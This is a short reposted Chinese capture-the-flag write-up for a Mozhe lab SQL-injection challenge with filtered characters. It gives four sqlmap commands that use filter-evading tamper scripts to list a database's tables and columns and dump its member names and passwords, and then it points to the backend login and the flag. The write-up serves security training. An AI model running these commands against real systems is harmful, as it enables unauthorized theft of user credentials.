SQL過濾字符后手工注入漏洞測試(第1題)

本文轉載自查看原文 2019-04-23 11:19 546 SQLmap/ Penetration Testing

https://www.mozhe.cn/bug/detail/a1diUUZsa3ByMkgrZnpjcWZOYVEyUT09bW96aGUmozhe

分析題目，屬於時間盲注，這種情況，通常使用sqlmap 直接注入就行了，手動語法太復雜了！！！

sqlmap -u "http://219.153.49.228:49703/new_list.php?id=1" --tamper charencode,equaltolike,space2comment --current-db

╰─ sqlmap -u "http://219.153.49.228:49703/new_list.php?id=1" --tamper charencode,equaltolike,space2comment -D mozhe_discuz_stormgroup --tables

╰─ sqlmap -u "http://219.153.49.228:49703/new_list.php?id=1" --tamper charencode,equaltolike,space2comment -D mozhe_discuz_stormgroup -T stormgroup_member --columns

╰─ sqlmap -u "http://219.153.49.228:49703/new_list.php?id=1" --tamper charencode,equaltolike,space2comment -D mozhe_discuz_stormgroup -T stormgroup_member -C name,password,status --dump

登錄后台，獲取flag，提交即可

免責聲明！

本站轉載的文章為個人學習借鑒使用，本站對版權不負任何法律責任。如果侵犯了您的隱私權益，請聯系本站郵箱yoyou2525@163.com刪除。

猜您在找 墨者學院 SQL手工注入漏洞測試(MySQL數據庫-字符型） SQL注入——Union注入攻擊——手工注入篇——SQL手工注入漏洞測試(MySQL數據庫) SQL注入——布爾型盲注注入攻擊——手工注入篇——SQL手工注入漏洞測試(MySQL數據庫) SQL手工注入漏洞測試(Sql Server數據庫) SQL手工注入繞過過濾 SQL手工注入 SQL注入語句-手工測試 SQL注入之手工注入 SQL注入之手工注入 SQL手工注入方法